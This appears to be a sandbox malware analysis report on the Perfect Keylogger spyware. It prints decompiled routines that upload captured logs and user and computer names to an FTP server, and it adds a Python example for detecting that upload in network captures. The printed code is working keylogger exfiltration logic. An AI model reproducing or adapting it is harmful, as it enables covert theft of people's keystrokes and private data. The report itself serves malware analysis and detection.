    • #924.MFC42(?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 00425986
    • #924.MFC42(?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat), ref: 00425999
    • #924.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 004259AC
    • #858.MFC42(?,?,?), ref: 004259D9
    • #858.MFC42(?,?,?,?,?,?), ref: 00425A02
    • #858.MFC42(?,?,?,?,?,?,?,?,?), ref: 00425A2B
    • #3790.MFC42(?,?,00000000,00000001,?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat), ref: 00425A5F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #924$#858$#3790#3811H_prolog
    • String ID: %02d-%02d-%02d-%02d-%02d-%02d$&+D$+$.jpg$/$Logs.zip$\th_$bpk.dat$bpkch.dat$chats.html$keystrokes.html$pk.bin$report.txt$th_$web.dat$websites.html
    • API String ID: 1850149866-2330608752
    • Opcode ID: 99f5d4af5fdab39e9dced2e2cf33b0b64344e946c006b4e51263e3909b1c0f9c
    • Instruction ID: 2fd924c9dfb00627db4062d1ff29b6eeb5a2703bbb20c6b90c5bcdfba0e5e0f1
    • Opcode Fuzzy Hash: 99f5d4af5fdab39e9dced2e2cf33b0b64344e946c006b4e51263e3909b1c0f9c
    • Instruction Fuzzy Hash: 4D82C171D00258EEDF21EBE4DC45BEEBFB8AF19308F54405EE50467292DB785A48CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E0041B588() {
    				void* _t63;
    				struct HWND__* _t64;
    				void* _t78;
    				void* _t92;
    				int _t94;
    				void* _t103;
    				struct HWND__* _t143;
    				char* _t144;
    				signed int _t148;
    				void* _t151;
    				void* _t157;
    
    				E0043E4E0(0x441574, _t157);
    				_t63 =  *(_t157 + 8);
    				if(_t63 != 0) {
    					_t64 =  *(_t63 + 0x20);
    					 *(_t157 - 0x14) = _t64;
    					_t143 = _t64;
    				} else {
    					_t143 = 0;
    					 *(_t157 - 0x14) = 0;
    				}
    				 *(_t157 - 0x24) = 7;
    				if(InternetGetConnectedState(_t157 - 0x24, 0) != 0) {
    					GetDlgItemTextA(_t143, 0x469, _t157 - 0x430, 0xff);
    					GetDlgItemTextA(_t143, 0x433, _t157 - 0x1ac, 0x7f);
    					GetDlgItemTextA(_t143, 0x434, _t157 - 0x22c, 0x7f);
    					GetDlgItemTextA(_t143, 0x435, _t157 - 0x12c, 0x103);
    					 *(_t157 - 0x20) = 1;
    					 *(_t157 - 0x10) = GetDlgItemInt(_t143, 0x46a, _t157 - 0x20, 0);
    					if( *(_t157 - 0x20) == 0) {
    						 *(_t157 - 0x10) = 0;
    					}
    					if( *(_t157 - 0x12c) == 0) {
    						lstrcpyA(_t157 - 0x12c, "/");
    					}
    					_t148 = IsDlgButtonChecked(_t143, 0x421);
    					_t78 = InternetOpenA("PK", 0, 0, 0, 0);
    					 *(_t157 + 8) = _t78;
    					if(_t78 != 0) {
    						asm("sbb esi, esi");
    						_t151 = InternetConnectA(_t78, _t157 - 0x430,  *(_t157 - 0x10), _t157 - 0x1ac, _t157 - 0x22c, 1,  ~_t148 & 0x08000000, 0);
    						if(_t151 != 0) {
    							if( *(_t157 - 0x12c) == 0 || FtpSetCurrentDirectoryA(_t151, _t157 - 0x12c) != 0) {
    								lstrcpyA(_t157 - 0x330, "Perfect Keylogger Test");
    								FtpCreateDirectoryA(_t151, _t157 - 0x330);
    								if( *(_t157 - 0x12c) != 0 &&  *((char*)(_t157 + lstrlenA(_t157 - 0x12c) - 0x12d)) != 0x2f) {
    									lstrcatA(_t157 - 0x12c, "/");
    								}
    								lstrcatA(_t157 - 0x12c, _t157 - 0x330);
    								if(FtpSetCurrentDirectoryA(_t151, _t157 - 0x12c) != 0) {
    									_t144 = "readme.txt";
    									_push(_t144);
    									_push(0x4558c8);
    									_push(_t157 - 0x18);
    									L0043DE20();
    									 *(_t157 - 4) = 0;
    									E00429029(_t157 - 0x1c, 0xe04d);
    									 *(_t157 - 4) = 1;
    									_t92 = CreateFileA( *(_t157 - 0x18), 0x40000000, 0, 0, 2, 0x80, 0);
    									 *(_t157 - 0x10) = _t92;
    									if(_t92 != 0xffffffff) {
    										_t94 = WriteFile( *(_t157 - 0x10),  *(_t157 - 0x1c),  *( *(_t157 - 0x1c) - 8), _t157 - 0x28, 0);
    										_push( *(_t157 - 0x10));
    										if(_t94 != 0) {
    											CloseHandle();
    											E0042AAFA( *(_t157 - 0x1c));
    											if(FtpPutFileA(_t151,  *(_t157 - 0x18), _t144, 2, 0) != 0) {
    												InternetCloseHandle(_t151);
    												InternetCloseHandle( *(_t157 + 8));
    												DeleteFileA( *(_t157 - 0x18));
    												_push(1);
    												_pop(0);
    												EnableWindow(GetDlgItem( *(_t157 - 0x14), 0x468), InternetCloseHandle);
    												_push(0xffffffff);
    												_push(0x40);
    												_push(0xe04c);
    												L0043E2CA();
    											} else {
    												_push(0xffffffff);
    												_push(0x30);
    												_push(0xe042);
    												L0043E2CA();
    												EnableWindow(GetDlgItem( *(_t157 - 0x14), 0x468), 1);
    												goto L23;
    											}
    										} else {
    											CloseHandle();
    											goto L24;
    										}
    									} else {
    										L23:
    										InternetCloseHandle(_t151);
    										InternetCloseHandle( *(_t157 + 8));
    										L24:
    									}
    									 *(_t157 - 4) = 0;
    									L0043DD36();
    									 *(_t157 - 4) =  *(_t157 - 4) | 0xffffffff;
    									L0043DD36();
    									_t103 = 0;
    								} else {
    									goto L20;
    								}
    							} else {
    								L20:
    								_push(0xffffffff);
    								_push(0x30);
    								_push(0xe041);
    								L0043E2CA();
    								EnableWindow(GetDlgItem(_t143, 0x468), 1);
    								InternetCloseHandle(_t151);
    								InternetCloseHandle( *(_t157 + 8));
    								goto L21;
    							}
    						} else {
    							_push(0xffffffff);
    							_push(0x30);
    							_push(0xe040);
    							L0043E2CA();
    							EnableWindow(GetDlgItem(_t143, 0x468), 1);
    							_push( *(_t157 + 8));
    							goto L11;
    						}
    					} else {
    						_push(0xffffffff);
    						_push(0x30);
    						_push(0xe03f);
    						L0043E2CA();
    						EnableWindow(GetDlgItem(_t143, 0x468), 1);
    						_push(0);
    						L11:
    						InternetCloseHandle();
    						goto L21;
    					}
    				} else {
    					_push(0xffffffff);
    					_push(0x30);
    					_push(0xe03f);
    					L0043E2CA();
    					EnableWindow(GetDlgItem(_t143, 0x468), 1);
    					L21:
    					_t103 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
    				return _t103;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041B58D
    • InternetGetConnectedState.WININET(?,00000000), ref: 0041B5BF
    • #1199.MFC42(0000E03F,00000030,000000FF), ref: 0041B5D2
    • GetDlgItem.USER32 ref: 0041B5DF
    • EnableWindow.USER32(00000000), ref: 0041B5E6
    • GetDlgItemTextA.USER32 ref: 0041B609
    • GetDlgItemTextA.USER32 ref: 0041B61A
    • GetDlgItemTextA.USER32 ref: 0041B62B
    • GetDlgItemTextA.USER32 ref: 0041B63F
    • GetDlgItemInt.USER32(?,0000046A,?,00000000), ref: 0041B653
    • lstrcpyA.KERNEL32(?,00454570), ref: 0041B678
    • IsDlgButtonChecked.USER32(?,00000421), ref: 0041B684
    • InternetOpenA.WININET(004546C4,00000000,00000000,00000000,00000000), ref: 0041B695
    • #1199.MFC42(0000E03F,00000030,000000FF), ref: 0041B6AB
    • GetDlgItem.USER32 ref: 0041B6B8
    • EnableWindow.USER32(00000000), ref: 0041B6BF
    • InternetCloseHandle.WININET(?), ref: 0041B6C6
    • InternetConnectA.WININET(00000000,?,?,?,?,00000001,00000000,00000000), ref: 0041B6F8
    • #1199.MFC42(0000E040,00000030,000000FF), ref: 0041B70D
    • GetDlgItem.USER32 ref: 0041B71A
    • EnableWindow.USER32(00000000), ref: 0041B721
    • FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 0041B73C
    • lstrcpyA.KERNEL32(?,Perfect Keylogger Test), ref: 0041B752
    • FtpCreateDirectoryA.WININET(00000000,?), ref: 0041B760
    • lstrlenA.KERNEL32(?), ref: 0041B775
    • lstrcatA.KERNEL32(?,00454570), ref: 0041B791
    • lstrcatA.KERNEL32(?,?), ref: 0041B7A5
    • FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 0041B7B3
    • #1199.MFC42(0000E041,00000030,000000FF), ref: 0041B7C6
    • GetDlgItem.USER32 ref: 0041B7D3
    • EnableWindow.USER32(00000000), ref: 0041B7DA
    • InternetCloseHandle.WININET(00000000), ref: 0041B7E7
    • InternetCloseHandle.WININET(?), ref: 0041B7EC
    • #924.MFC42(?,004558C8,readme.txt), ref: 0041B804
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,004558C8,readme.txt), ref: 0041B832
    • InternetCloseHandle.WININET(00000000), ref: 0041B847
    • InternetCloseHandle.WININET(?), ref: 0041B84C
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0041B865
    • CloseHandle.KERNEL32(?), ref: 0041B872
    • CloseHandle.KERNEL32(?), ref: 0041B87A
    • FtpPutFileA.WININET(00000000,?,readme.txt,00000002,00000000), ref: 0041B891
    • #1199.MFC42(0000E042,00000030,000000FF), ref: 0041B8A4
    • GetDlgItem.USER32 ref: 0041B8B3
    • EnableWindow.USER32(00000000), ref: 0041B8BA
    • InternetCloseHandle.WININET(00000000), ref: 0041B8CC
    • InternetCloseHandle.WININET(?), ref: 0041B8D1
    • DeleteFileA.KERNEL32(?), ref: 0041B8D6
    • GetDlgItem.USER32 ref: 0041B8E8
    • EnableWindow.USER32(00000000), ref: 0041B8EF
    • #1199.MFC42(0000E04C,00000040,000000FF), ref: 0041B8FE
    • #800.MFC42(0000E04C,00000040,000000FF), ref: 0041B909
    • #800.MFC42(0000E04C,00000040,000000FF), ref: 0041B915
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Item$Internet$CloseHandle$#1199EnableWindow$FileText$Directory$#800CreateCurrentlstrcatlstrcpy$#924ButtonCheckedConnectConnectedDeleteH_prologOpenStateWritelstrlen
    • String ID: /$Perfect Keylogger Test$readme.txt
    • API String ID: 135932680-3194278292
    • Opcode ID: 53577c25f09a491ba667c4c30a633665eeecda74440f7217b41fbe1d16934b30
    • Instruction ID: 02b635a109f93d23736334a9f8dc10db003247dab9decaa58358aed7eeadb697
    • Opcode Fuzzy Hash: 53577c25f09a491ba667c4c30a633665eeecda74440f7217b41fbe1d16934b30
    • Instruction Fuzzy Hash: A3A1A5B1940218BBDB109BA0DC4AFEF7B7CEF4A751F00416AF215B61D0D7784A80CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E004276F1() {
    				void* _t86;
    				char _t95;
    				char* _t99;
    				intOrPtr _t100;
    				void* _t101;
    				void* _t102;
    				char _t108;
    				void* _t111;
    				void* _t112;
    				char** _t113;
    				int _t118;
    				signed int _t134;
    				char* _t151;
    				CHAR* _t155;
    				CHAR* _t158;
    				void* _t160;
    				CHAR* _t161;
    				void* _t164;
    
    				E0043E4E0(0x442dc4, _t164);
    				_t158 =  *(_t164 + 8);
    				_t151 =  &(_t158[0x369]);
    				if(_t158[0x369] != 0) {
    					lstrcpyA(_t164 - 0x1c0,  &(_t158[0x569]));
    					if( *(_t164 - 0x1c0) == 0) {
    						lstrcpyA(_t164 - 0x1c0, "/");
    					}
    					_t86 = InternetOpenA("PK", 0, 0, 0, 0);
    					 *(_t164 - 0x10) = _t86;
    					_push(0);
    					if(_t86 != 0) {
    						asm("sbb ecx, ecx");
    						_t160 = InternetConnectA(_t86, _t151, _t158[0x106c],  &(_t158[0x469]),  &(_t158[0x4e9]), 1,  ~(_t158[0x368]) & 0x08000000, ??);
    						__eflags = _t160;
    						 *(_t164 - 0x20) = _t160;
    						if(_t160 != 0) {
    							__eflags =  *(_t164 - 0x1c0);
    							if( *(_t164 - 0x1c0) == 0) {
    								L11:
    								 *(_t164 - 0x14) = 0x7f;
    								GetComputerNameA(_t164 - 0x240, _t164 - 0x14);
    								 *(_t164 - 0x14) = 0x80;
    								GetUserNameA(_t164 - 0x2c0, _t164 - 0x14);
    								_push(_t164 - 0x38);
    								L0043E162();
    								_t95 =  *0x4550cc; // 0x0
    								 *((char*)(_t164 - 0xbc)) = _t95;
    								_t134 = 0x1f;
    								memset(_t164 - 0xbb, 0, _t134 << 2);
    								asm("stosw");
    								asm("stosb");
    								_t99 = E0042A943(_t164 - 0xbc);
    								_t155 = ".txt";
    								_push(_t155);
    								L0043DE26();
    								 *(_t164 - 0x18) = _t99;
    								_t100 = _t164 - 0xbc;
    								_push(_t100);
    								 *(_t164 - 4) = 0;
    								L0043DE26();
    								 *((intOrPtr*)(_t164 - 0x1c)) = _t100;
    								_t161 = "notify.";
    								_t101 = _t164 - 0x34;
    								_push(_t161);
    								_push(0x4558c8);
    								_push(_t101);
    								 *(_t164 - 4) = 1;
    								L0043DE20();
    								_push( *((intOrPtr*)(_t164 - 0x1c)));
    								 *(_t164 - 4) = 2;
    								_push(_t101);
    								_t102 = _t164 - 0x30;
    								_push(_t102);
    								L0043E282();
    								_push( *(_t164 - 0x18));
    								 *(_t164 - 4) = 3;
    								_push(_t102);
    								_push(_t164 + 8);
    								L0043E282();
    								 *(_t164 - 4) = 8;
    								L0043DD36();
    								 *(_t164 - 4) = 7;
    								L0043DD36();
    								 *(_t164 - 4) = 6;
    								L0043DD36();
    								 *(_t164 - 4) = 5;
    								L0043DD36();
    								_push(_t164 - 0xbc);
    								_push(_t164 - 0x2c0);
    								_push(_t164 - 0x240);
    								_push(_t164 - 0x38);
    								_push( *(_t164 + 8));
    								_t108 = E004275DF(__eflags);
    								__eflags = _t108;
    								if(_t108 != 0) {
    									_push(_t155);
    									L0043DE26();
    									_t111 = _t164 - 0xbc;
    									_push(_t111);
    									 *(_t164 - 4) = 9;
    									L0043DE26();
    									_push(_t111);
    									_t112 = _t164 - 0x1c;
    									_push(_t161);
    									_push(_t112);
    									 *(_t164 - 4) = 0xa;
    									L0043E168();
    									_push(_t108);
    									_push(_t112);
    									_t113 = _t164 - 0x18;
    									 *(_t164 - 4) = 0xb;
    									_push(_t113);
    									L0043E282();
    									FtpPutFileA( *(_t164 - 0x20),  *(_t164 + 8),  *_t113, 2, 0);
    									L0043DD36();
    									 *(_t164 - 4) = 0xa;
    									L0043DD36();
    									 *(_t164 - 4) = 9;
    									L0043DD36();
    									 *(_t164 - 4) = 5;
    									L0043DD36();
    									DeleteFileA( *(_t164 + 8));
    								}
    								InternetCloseHandle( *(_t164 - 0x20));
    								InternetCloseHandle( *(_t164 - 0x10));
    								_t76 = _t164 - 4;
    								 *_t76 =  *(_t164 - 4) | 0xffffffff;
    								__eflags =  *_t76;
    								L0043DD36();
    								_push(1);
    								_pop(0);
    							} else {
    								_t118 = FtpSetCurrentDirectoryA(_t160, _t164 - 0x1c0);
    								__eflags = _t118;
    								if(_t118 != 0) {
    									goto L11;
    								} else {
    									InternetCloseHandle(_t160);
    									InternetCloseHandle( *(_t164 - 0x10));
    									goto L10;
    								}
    							}
    						} else {
    							_push( *(_t164 - 0x10));
    							goto L4;
    						}
    					} else {
    						L4:
    						InternetCloseHandle();
    						goto L10;
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t164 - 0xc));
    				return 0;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004276F6
    • lstrcpyA.KERNEL32(?,?), ref: 00427729
    • lstrcpyA.KERNEL32(?,00454570), ref: 00427743
    • InternetOpenA.WININET(004546C4,00000000,00000000,00000000,00000000), ref: 00427752
    • InternetCloseHandle.WININET(?), ref: 00427760
    • InternetConnectA.WININET(00000000,?,?,?,?,00000001,?,00000000), ref: 00427793
    • FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 004277B7
    • InternetCloseHandle.WININET(00000000), ref: 004277C8
    • InternetCloseHandle.WININET(?), ref: 004277CD
    • GetComputerNameA.KERNEL32 ref: 004277E8
    • GetUserNameA.ADVAPI32(?,0000007F), ref: 00427800
    • #3811.MFC42(?), ref: 0042780A
    • #537.MFC42(.txt,?), ref: 00427840
    • #537.MFC42(?,.txt,?), ref: 00427855
    • #924.MFC42(?,004558C8,notify.,?,.txt,?), ref: 00427870
    • #922.MFC42(?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 00427881
    • #922.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 00427892
    • #800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 0042789E
    • #800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278AA
    • #800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278B6
    • #800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278C2
    • #537.MFC42(.txt,.txt,?), ref: 004278F7
    • #537.MFC42(?,.txt,.txt,?), ref: 0042790C
    • #926.MFC42(?,notify.,00000000,?,.txt,.txt,?), ref: 0042791B
    • #922.MFC42(?,00000000,00000000,?,notify.,00000000,?,.txt,.txt,?), ref: 0042792A
    • FtpPutFileA.WININET(?,?,?,00000002,00000000), ref: 0042793B
    • #800.MFC42 ref: 00427944
    • #800.MFC42 ref: 00427950
    • #800.MFC42 ref: 0042795C
    • #800.MFC42 ref: 00427968
    • DeleteFileA.KERNEL32(?), ref: 00427970
    • InternetCloseHandle.WININET(?), ref: 0042797F
    • InternetCloseHandle.WININET(?), ref: 00427984
    • #800.MFC42 ref: 0042798D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800$Internet$CloseHandle$#537$#922$FileNamelstrcpy$#3811#924#926ComputerConnectCurrentDeleteDirectoryH_prologOpenUser
    • String ID: .txt$notify.
    • API String ID: 468773576-4159035570
    • Opcode ID: 6872f416e6a2f4ba84731a5947b19d21d15e962369cfee36e417a94b9d752ff8
    • Instruction ID: a3b7b0195e1be24dddbf1d698d64809fb25d4a444a8b1638fdecb1cb1a5429e5
    • Opcode Fuzzy Hash: 6872f416e6a2f4ba84731a5947b19d21d15e962369cfee36e417a94b9d752ff8
    • Instruction Fuzzy Hash: 18817D72D01259EEDB11EBA0DC45FEFBBBCAF19304F1045AAF505A3141DB385A48CB69
    Uniqueness

    Uniqueness Score: -1.00%
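The two routines above (0x0041B58D, the FTP "test settings" path that creates the directory "Perfect Keylogger Test" and uploads readme.txt, and 0x004276F1, which uploads a "notify.<token>.txt" file) drive WinINet with the same call sequence: InternetConnectA with nService 1 (INTERNET_SERVICE_FTP) and the flag `~x & 0x08000000` (INTERNET_FLAG_PASSIVE, taken from a dialog checkbox), FtpSetCurrentDirectoryA, FtpCreateDirectoryA and FtpPutFileA with dwFlags 2 (FTP_TRANSFER_TYPE_BINARY). The following is an added example written for this report, not code from the sample or from the vendor: it maps that call sequence onto the FTP control-channel verbs WinINet issues, so the behaviour can be matched in a network capture, and scans a constructed session log for the resulting upload pattern. The WinINet constants are the documented values; the order of TYPE/PASV before STOR is WinINet's usual behaviour but is a simplification, the "notify" token is produced by E0042A943 and is not recoverable here (any non-separator characters are accepted), and the session lines are made up for the example.

```python
"""Added example for this report, not code from the sample: WinINet FTP call
sequence -> FTP control-channel verbs, plus a scanner for the upload pattern
of the routines at 0x0041B58D and 0x004276F1.  The session log is constructed."""
import re

INTERNET_SERVICE_FTP = 1             # nService passed to InternetConnectA
INTERNET_FLAG_PASSIVE = 0x08000000   # the "~x & 0x08000000" flag; set from a dialog checkbox
FTP_TRANSFER_TYPE_BINARY = 2         # dwFlags passed to FtpPutFileA

PKL_TEST_DIR = "Perfect Keylogger Test"   # lstrcpyA literal at 0x0041B752
# Remote name in the notify routine is "notify." + <token> + ".txt"; the token
# comes from E0042A943 and is not recoverable here (assumption: any characters
# other than a path separator).
NOTIFY_NAME_RE = re.compile(r"^notify\.[^/\\]+\.txt$")


def wininet_to_ftp(calls):
    """Translate (api, args) tuples into the FTP verbs WinINet sends for them.
    InternetConnectA logs in; FtpSetCurrentDirectoryA is CWD; FtpCreateDirectoryA
    is MKD; FtpPutFileA sets the type, opens the data channel (PASV if the
    connection was opened with INTERNET_FLAG_PASSIVE, else PORT) and sends STOR."""
    verbs, passive = [], False
    for api, args in calls:
        if api == "InternetConnectA":
            if args["service"] != INTERNET_SERVICE_FTP:
                raise ValueError("only INTERNET_SERVICE_FTP is modelled")
            passive = bool(args["flags"] & INTERNET_FLAG_PASSIVE)
            verbs += [f"USER {args['user']}", "PASS <password>"]
        elif api == "FtpSetCurrentDirectoryA":
            verbs.append(f"CWD {args['dir']}")
        elif api == "FtpCreateDirectoryA":
            verbs.append(f"MKD {args['dir']}")
        elif api == "FtpPutFileA":
            binary = args["flags"] & FTP_TRANSFER_TYPE_BINARY
            verbs.append("TYPE I" if binary else "TYPE A")
            verbs.append("PASV" if passive else "PORT <addr>")
            verbs.append(f"STOR {args['remote']}")
    return verbs


def find_pkl_upload(session_lines):
    """Scan "C: <verb> <arg>" client lines of an FTP control-channel capture for
    the settings test (MKD "Perfect Keylogger Test", then STOR readme.txt inside
    that directory) and the notify upload (STOR notify.<token>.txt)."""
    hits = {"test_dir_created": False, "readme_uploaded": False,
            "notify_uploaded": False}
    in_test_dir = False
    for line in session_lines:
        if not line.startswith("C: "):
            continue                      # server replies are not needed here
        verb, _, arg = line[3:].partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb == "MKD" and arg.rstrip("/").endswith(PKL_TEST_DIR):
            hits["test_dir_created"] = True
        elif verb == "CWD":
            in_test_dir = arg.rstrip("/").endswith(PKL_TEST_DIR)
        elif verb == "STOR":
            name = arg.rsplit("/", 1)[-1]
            if name == "readme.txt" and in_test_dir:
                hits["readme_uploaded"] = True
            elif NOTIFY_NAME_RE.match(name):
                hits["notify_uploaded"] = True
    return hits


# Constructed session, in the shape the settings-test routine would produce.
SAMPLE_SESSION = [
    "C: USER ftpuser",
    "S: 331 Password required for ftpuser",
    "C: PASS <password>",
    "C: CWD /upload",
    "C: MKD Perfect Keylogger Test",
    "C: CWD /upload/Perfect Keylogger Test",
    "C: TYPE I",
    "C: PASV",
    "C: STOR readme.txt",
    "S: 226 Transfer complete",
]


def run_example():
    """Return (verbs expected from the settings test, indicators hit in SAMPLE_SESSION)."""
    calls = [
        ("InternetConnectA", {"user": "ftpuser", "service": INTERNET_SERVICE_FTP,
                              "flags": INTERNET_FLAG_PASSIVE}),
        ("FtpSetCurrentDirectoryA", {"dir": "/upload"}),
        ("FtpCreateDirectoryA", {"dir": PKL_TEST_DIR}),
        ("FtpSetCurrentDirectoryA", {"dir": "/upload/" + PKL_TEST_DIR}),
        ("FtpPutFileA", {"remote": "readme.txt", "flags": FTP_TRANSFER_TYPE_BINARY}),
    ]
    return wininet_to_ftp(calls), find_pkl_upload(SAMPLE_SESSION)
```

`find_pkl_upload` only keys on the directory name and the two file names, which is what a Zeek `ftp.log` or a proxy log would preserve; the credentials and host in InternetConnectA are read from the dialog at runtime and are not in the binary, so they cannot be used as static indicators.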

    C-Code - Quality: 63%
    			E004247C9(void* __eflags) {
    				void* _t67;
    				void* _t68;
    				int _t77;
    				int _t85;
    				void* _t87;
    				void* _t90;
    				void* _t91;
    				int _t101;
    				void* _t124;
    				void* _t129;
    				void* _t131;
    				CHAR* _t132;
    
    				_t67 = E0043E4E0(0x44287c, _t129);
    				_t132 = _t131 - 0x180;
    				_push("\\*.");
    				L0043DE26();
    				 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
    				_t124 = "dt";
    				_push(_t124);
    				_t68 = _t129 - 0x34;
    				_push(0x4558c4);
    				_push(_t68);
    				L0043DE20();
    				_push(_t67);
    				_push(_t68);
    				 *(_t129 - 4) = 1;
    				_push(_t129 - 0x10);
    				L0043E282();
    				 *(_t129 - 4) = 4;
    				L0043DD36();
    				 *(_t129 - 4) = 3;
    				L0043DD36();
    				_push(_t129 - 0x2c);
    				 *(_t129 + 8) = _t132;
    				 *_t132 = ( *(_t129 + 8))[0x678] * 0x15180;
    				L0043E162();
    				E004249C0(_t129 + 8, _t129 + 8, _t129 - 0x3c);
    				_t77 = FindFirstFileA( *(_t129 - 0x10), _t129 - 0x18c);
    				 *(_t129 - 0x28) = _t77;
    				if(_t77 == 0xffffffff) {
    					L7:
    					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
    					L0043DD36();
    					 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
    					return _t77;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t85 = sscanf(_t129 - 0x160, "%d-%d-%d_%d-%d-%d", _t129 - 0x20, _t129 - 0x18, _t129 - 0x14, _t129 - 0x1c, _t129 - 0x24, _t129 - 0x44);
    					_t132 =  &(_t132[0x20]);
    					if(_t85 == 6) {
    						L3:
    						_push(0xffffffff);
    						_push(0);
    						_push( *((intOrPtr*)(_t129 - 0x24)));
    						_push( *((intOrPtr*)(_t129 - 0x1c)));
    						_push( *((intOrPtr*)(_t129 - 0x14)));
    						_push( *((intOrPtr*)(_t129 - 0x18)));
    						_push( *((intOrPtr*)(_t129 - 0x20)));
    						L0043E49E();
    						 *(_t129 - 0x4c) = _t132;
    						 *_t132 =  *(_t129 - 0x3c);
    						_t87 = E004249CF(_t129 - 0x48, _t129 - 0x48);
    						if(_t87 != 0) {
    							_push(1);
    							_push(0x5c);
    							L0043E34E();
    							_push(_t124);
    							_t90 = _t129 - 0x38;
    							_push(0x4558c4);
    							_push(_t90);
    							 *(_t129 - 4) = 5;
    							L0043DE20();
    							_push(_t87);
    							_push(_t90);
    							_t91 = _t129 - 0x30;
    							 *(_t129 - 4) = 6;
    							_push(_t91);
    							L0043E282();
    							 *(_t129 - 4) = 7;
    							_push(_t129 - 0x160);
    							_push(_t91);
    							_push(_t129 + 8);
    							L0043DE20();
    							 *(_t129 - 4) = 0xb;
    							L0043DD36();
    							 *(_t129 - 4) = 0xa;
    							L0043DD36();
    							 *(_t129 - 4) = 9;
    							L0043DD36();
    							DeleteFileA( *(_t129 + 8));
    							 *(_t129 - 4) = 3;
    							L0043DD36();
    						}
    						goto L5;
    					}
